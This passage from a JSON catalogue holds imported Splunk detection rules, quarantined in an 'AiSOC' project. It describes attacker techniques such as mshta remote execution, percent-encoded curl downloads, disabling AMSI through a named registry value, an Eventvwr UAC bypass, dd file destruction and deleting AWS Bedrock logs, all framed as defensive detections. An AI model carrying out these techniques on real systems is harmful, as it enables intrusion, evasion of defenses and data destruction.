etc.) or Sysinternals Suit tools, are frequently used by administrators for legitimate maintenance but are also leveraged by threat actors to collect system, account, network and service information during discovery and lateral movement.\nThis detection focuses on process execution and PE metadata telemetry (OriginalFileName).\nIf confirmed malicious, this activity can indicate targeted reconnaissance and foothold escalation, enabling subsequent lateral movement or credential abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1046", "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-pstools-recon-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a5f4b3e-1d2b-4c6f-9a8e-3b7d2f5c1a6e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_pstools_recon_usage.yml" } }, { "id": "splunk-security-content-9a7a490c-5581-4c95-bab5-a21e351293ef", "type": "detection", "name": "Windows Cisco Secure Endpoint Unblock File Via Sfc", "description": "The following analytic detects the use of the sfc.exe utility with the \"-unblock\" parameter, a feature within Cisco Secure Endpoint. The \"-unblock\" flag is used to remove system blocks imposed by the endpoint protection. This detection focuses on command-line activity that includes the \"-unblock\" parameter, as it may indicate an attempt to restore access to files or processes previously blocked by the security software. While this action could be legitimate in troubleshooting scenarios, malicious actors might use it to override protective measures, enabling execution of blocked malicious payloads or bypassing other security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-unblock-file-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a7a490c-5581-4c95-bab5-a21e351293ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_unblock_file_via_sfc.yml" } }, { "id": "splunk-security-content-9a8d5516-4c5e-11ef-9d42-acde48001122", "type": "detection", "name": "Curl Execution with Percent Encoded URL", "description": "The following analytic detects the execution of the curl utility where the command line includes percent-encoded characters and explicit file output options (such as -o or --output).\nIt leverages process execution telemetry from Endpoint Detection and Response (EDR) data sources to identify curl commands that may be using URL encoding to obfuscate download locations or payload paths.\nThis behavior is notable because percent-encoded URLs are commonly used by adversaries to evade simple string-based detections, hide malicious infrastructure, or bypass network security controls.\nWhen combined with file download behavior, this activity may indicate malware staging, payload retrieval, or secondary tool deployment.\nAnalysts should review the decoded URL, destination host, parent process, and downloaded file to determine whether the activity is authorized or malicious.\nThe analytic calculates the number of percent (%) characters in the curl command line and triggers when a threshold of three or more is met, indicating potential URL encoding.\nAdjust the threshold as needed based on your environment and tuning requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/curl-execution-with-percent-encoded-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a8d5516-4c5e-11ef-9d42-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/curl_execution_with_percent_encoded_url.yml" } }, { "id": "splunk-security-content-9a8f63a8-43ac-11ec-904c-acde48001122", "type": "detection", "name": "Firewall Allowed Program Enable", "description": "The following analytic detects the modification of a firewall rule to allow the execution of a specific application. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events with command-line arguments related to firewall rule changes. This activity is significant as it may indicate an attempt to bypass firewall restrictions, potentially allowing unauthorized applications to communicate over the network. If confirmed malicious, this could enable an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the target environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/firewall-allowed-program-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a8f63a8-43ac-11ec-904c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/firewall_allowed_program_enable.yml" } }, { "id": "splunk-security-content-9b0c2d3e-4f5a-6b7c-8d9e-0f1a2b3c4d5e", "type": "detection", "name": "Cisco Secure Firewall - SSH Connection to Non-Standard Port", "description": "This analytic detects inbound SSH connections to non-standard ports on network devices using Cisco Secure Firewall Intrusion Events. APT actors have been observed enabling SSH servers on high, non-default TCP ports to maintain encrypted remote access to compromised network infrastructure.\nThis detection leverages Snort signature 65369 to identify SSH protocol traffic on unusual ports, which may indicate persistence mechanisms or backdoor access established by threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-ssh-connection-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b0c2d3e-4f5a-6b7c-8d9e-0f1a2b3c4d5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___ssh_connection_to_non_standard_port.yml" } }, { "id": "splunk-security-content-9b1a5385-0c31-4c39-9753-dc26b8ce64c2", "type": "detection", "name": "Windows Steal Authentication Certificates Certificate Issued", "description": "The following analytic identifies the issuance of a new certificate by Certificate Services - AD CS, detected via Event ID 4887. This event logs the requester user context, DNS hostname of the requesting machine, and the request time. Monitoring this activity is crucial as it can indicate potential misuse of authentication certificates. If confirmed malicious, an attacker could use the issued certificate to impersonate users, escalate privileges, or maintain persistence within the environment. This detection helps in identifying and correlating suspicious certificate-related activities for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certificate-issued.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b1a5385-0c31-4c39-9753-dc26b8ce64c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certificate_issued.yml" } }, { "id": "splunk-security-content-9b2b819d-c76b-4dc6-bd3d-148edb8de83e", "type": "detection", "name": "Zoom Rare Video Devices", "description": "Detects rare video devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to a majority of employees. Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-video-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b2b819d-c76b-4dc6-bd3d-148edb8de83e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_video_devices.yml" } }, { "id": "splunk-security-content-9b3af1e6-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect MSHTA Url in Command Line", "description": "The following analytic detects the use of Microsoft HTML Application Host (mshta.exe) to make remote HTTP or HTTPS connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments containing URLs. This activity is significant because adversaries often use mshta.exe to download and execute remote .hta files, bypassing security controls. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b3af1e6-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_url_in_command_line.yml" } }, { "id": "splunk-security-content-9b5e7c14-f8d2-4a3b-b1a7-e5c9f2a8d123", "type": "detection", "name": "Windows AppX Deployment Unsigned Package Installation", "description": "The following analytic detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter. This detection leverages Windows event logs from the AppXDeployment-Server, specifically focusing on EventID 603 which indicates the start of a deployment operation with specific deployment flags. The flag value 8388608 corresponds to the -AllowUnsigned option in PowerShell's Add-AppxPackage cmdlet. This activity is significant as adversaries have been observed leveraging unsigned MSIX packages to deliver malware, bypassing signature verification that would normally protect users from malicious packages. If confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-unsigned-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b5e7c14-f8d2-4a3b-b1a7-e5c9f2a8d123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_unsigned_package_installation.yml" } }, { "id": "splunk-security-content-9b5f1832-e8b9-453f-93df-07a3d6a72a45", "type": "detection", "name": "Kubernetes Unauthorized Access", "description": "The following analytic detects unauthorized access attempts to Kubernetes by analyzing Kubernetes audit logs. It identifies anomalies in access patterns by examining the source of requests and their response statuses. This activity is significant for a SOC as it may indicate an attacker attempting to infiltrate the Kubernetes environment. If confirmed malicious, such access could lead to unauthorized control over Kubernetes resources, potentially compromising sensitive systems or data within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-unauthorized-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b5f1832-e8b9-453f-93df-07a3d6a72a45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_unauthorized_access.yml" } }, { "id": "splunk-security-content-9b62da2c-e442-474f-83ca-fac4dabab1b3", "type": "detection", "name": "Windows File and Directory Permissions Remove Inheritance", "description": "The following analytic detects the removal of permission inheritance using ICACLS. This analytic identifies instances where ICACLS is used to remove permission inheritance from files or directories. The /inheritance:r flag, which strips inherited permissions while optionally preserving or altering explicit permissions, is monitored to detect changes that may restrict access or establish isolated permission configurations. Removing inheritance can be a legitimate administrative action but may also indicate an attempt to conceal malicious activity or bypass inherited security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-permissions-remove-inheritance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b62da2c-e442-474f-83ca-fac4dabab1b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_permissions_remove_inheritance.yml" } }, { "id": "splunk-security-content-9b6aae5e-8d85-11ec-b2ae-acde48001122", "type": "detection", "name": "Linux DD File Overwrite", "description": "The following analytic detects the use of the 'dd' command to overwrite files on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because adversaries often use the 'dd' command to destroy or irreversibly overwrite files, disrupting system availability and services. If confirmed malicious, this behavior could lead to data destruction, making recovery difficult and potentially causing significant operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b6aae5e-8d85-11ec-b2ae-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_dd_file_overwrite.yml" } }, { "id": "splunk-security-content-9bbc62e8-55d8-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious microsoft workflow compiler usage", "description": "The following analytic identifies the usage of microsoft.workflow.compiler.exe, a rarely utilized executable typically found in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution telemetry. The significance of this activity lies in its uncommon usage, which may indicate malicious intent such as code execution or persistence mechanisms. If confirmed malicious, an attacker could leverage this process to execute arbitrary code, potentially leading to unauthorized access or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-microsoft-workflow-compiler-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9bbc62e8-55d8-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml" } }, { "id": "splunk-security-content-9bce3a97-bc97-4e89-a1aa-ead151c82fbb", "type": "detection", "name": "Windows Remote Services Allow Remote Assistance", "description": "The following analytic detects modifications in the Windows registry to enable remote desktop assistance on a targeted machine. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"Control\\\\Terminal Server\\\\fAllowToGetHelp\" registry path. This activity is significant because enabling remote assistance via registry is uncommon and often associated with adversaries or malware like Azorult. If confirmed malicious, this could allow an attacker to remotely access and control the compromised host, leading to potential data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-allow-remote-assistance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9bce3a97-bc97-4e89-a1aa-ead151c82fbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_allow_remote_assistance.yml" } }, { "id": "splunk-security-content-9be30d80-3a39-4df9-9102-64a467b24eac", "type": "detection", "name": "Log4Shell CVE-2021-44228 Exploitation", "description": "The following analytic identifies potential exploitation of Log4Shell CVE-2021-44228 by correlating multiple MITRE ATT&CK tactics detected in risk events. It leverages Splunk's risk data model to calculate the distinct count of MITRE ATT&CK tactics from Log4Shell-related detections. This activity is significant because it indicates a high probability of exploitation if two or more distinct tactics are observed. If confirmed malicious, this activity could lead to initial payload delivery, callback to a malicious server, and post-exploitation activities, potentially resulting in unauthorized access, lateral movement, and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190", "T1059", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-cve-2021-44228-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9be30d80-3a39-4df9-9102-64a467b24eac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/log4shell_cve_2021_44228_exploitation.yml" } }, { "id": "splunk-security-content-9be56c82-b1cc-4318-87eb-d138afaaca39", "type": "detection", "name": "Malicious PowerShell Process - Execution Policy Bypass", "description": "The following analytic detects PowerShell processes initiated with parameters that bypass the local execution policy for scripts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing specific flags like \"-ex\" or \"bypass.\" This activity is significant because bypassing execution policies is a common tactic used by attackers to run malicious scripts undetected. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to further system compromise, data exfiltration, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-execution-policy-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9be56c82-b1cc-4318-87eb-d138afaaca39", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml" } }, { "id": "splunk-security-content-9c24aef6-cad9-4931-acce-74318aa5663b", "type": "detection", "name": "Windows Security And Backup Services Stop", "description": "The following analytic detects the suspicious termination of known services commonly targeted by ransomware before file encryption. It leverages Windows System Event Logs (EventCode 7036) to identify when critical services such as Volume Shadow Copy, backup, and antivirus services are stopped. This activity is significant because ransomware often disables these services to avoid errors and ensure successful file encryption. If confirmed malicious, this behavior could lead to widespread data encryption, rendering files inaccessible and potentially causing significant operational disruption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-and-backup-services-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c24aef6-cad9-4931-acce-74318aa5663b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_and_backup_services_stop.yml" } }, { "id": "splunk-security-content-9c2620a8-94a1-11ec-b40c-acde48001122", "type": "detection", "name": "Windows Event For Service Disabled", "description": "The following analytic detects when a Windows service is modified from a start type to disabled. It leverages system event logs, specifically EventCode 7040, to identify this change. This activity is significant because adversaries often disable security or other critical services to evade detection and maintain control over a compromised host. If confirmed malicious, this action could allow attackers to bypass security defenses, leading to further exploitation and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-for-service-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c2620a8-94a1-11ec-b40c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_for_service_disabled.yml" } }, { "id": "splunk-security-content-9c27ec42-d338-11eb-9044-acde48001122", "type": "detection", "name": "Disable AMSI Through Registry", "description": "The following analytic detects modifications to the Windows registry that disable the Antimalware Scan Interface (AMSI) by setting the \"AmsiEnable\" value to \"0x00000000\". This detection leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\". Disabling AMSI is significant as it is a common technique used by ransomware, Remote Access Trojans (RATs), and Advanced Persistent Threats (APTs) to evade detection and impair defenses. If confirmed malicious, this activity could allow attackers to execute payloads with minimal alerts, leading to potential system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-amsi-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c27ec42-d338-11eb-9044-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_amsi_through_registry.yml" } }, { "id": "splunk-security-content-9c5e3d62-f743-11ee-9f6e-acde48001124", "type": "detection", "name": "AWS Bedrock Delete Model Invocation Logging Configuration", "description": "The following analytic identifies attempts to delete AWS Bedrock model invocation logging configurations. It leverages AWS CloudTrail logs to detect when a user or service calls the DeleteModelInvocationLogging API. This activity is significant as it may indicate an adversary attempting to remove audit trails of model interactions after compromising credentials. Deleting model invocation logs could allow attackers to interact with AI models without leaving traces, potentially enabling them to conduct data exfiltration, prompt injection attacks, or other malicious activities without detection. If confirmed malicious, this could represent a deliberate attempt to hide unauthorized model usage and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-model-invocation-logging-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c5e3d62-f743-11ee-9f6e-acde48001124", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_model_invocation_logging_configuration.yml" } }, { "id": "splunk-security-content-9c8e4f2a-7d3b-4e5c-8a9f-1b6d4e8c3f5a", "type": "detection", "name": "Cisco ASA - New Local User Account Created", "description": "This analytic detects creation of new user accounts on Cisco ASA devices via CLI or ASDM.\nAdversaries may create unauthorized user accounts to establish persistence, maintain backdoor access, or elevate privileges on network infrastructure devices. These rogue accounts can provide attackers with continued access even after initial compromise vectors are remediated.\nThe detection monitors for ASA message ID 502101, which is generated whenever a new user account is created on the device, capturing details including the username, privilege level, and the administrator who created the account.\nInvestigate unexpected account creations, especially those with elevated privileges (level 15), accounts created outside business hours, accounts with suspicious or generic names, or accounts created by non-administrative users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-new-local-user-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c8e4f2a-7d3b-4e5c-8a9f-1b6d4e8c3f5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___new_local_user_account_created.yml" } }, { "id": "splunk-security-content-9c94732a-61af-11ec-91e3-acde48001122", "type": "detection", "name": "Linux Possible Append Command To Profile Config File", "description": "The following analytic detects suspicious command-lines that modify user profile files to automatically execute scripts or executables upon system reboot. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving profile files like ~/.bashrc and /etc/profile. This activity is significant as it indicates potential persistence mechanisms used by adversaries to maintain access to compromised hosts. If confirmed malicious, this could allow attackers to execute arbitrary code upon reboot, leading to persistent control over the system and potential further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-command-to-profile-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c94732a-61af-11ec-91e3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_command_to_profile_config_file.yml" } }, { "id": "splunk-security-content-9cd6d066-94d5-4ccd-a8b9-28c03ca91be8", "type": "detection", "name": "Detect Large ICMP Traffic", "description": "The following analytic identifies ICMP traffic to external IP addresses with total bytes (sum of bytes in and bytes out) greater than 1,000 bytes.\nIt leverages the Network_Traffic data model to detect large ICMP packet that aren't blocked and are directed toward external networks. We use All_Traffic.bytes in the detection to capture variations in inbound versus outbound traffic sizes, as significant discrepancies or unusually large ICMP exchanges can indicate information smuggling, covert communication, or command-and-control (C2) activities.\nIf validated as malicious, this could signal ICMP tunneling, unauthorized data transfer, or compromised endpoints requiring immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-large-icmp-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9cd6d066-94d5-4ccd-a8b9-28c03ca91be8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_large_icmp_traffic.yml" } }, { "id": "splunk-security-content-9cf8fe08-7ad8-11eb-9819-acde48001122", "type": "detection", "name": "Eventvwr UAC Bypass", "description": "The following analytic detects an Eventvwr UAC bypass by identifying suspicious registry modifications in the path that Eventvwr.msc references upon execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry changes and process execution details. This activity is significant because it indicates a potential privilege escalation attempt, allowing an attacker to execute arbitrary commands with elevated privileges. If confirmed malicious, this could lead to unauthorized code execution, persistence, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/eventvwr-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 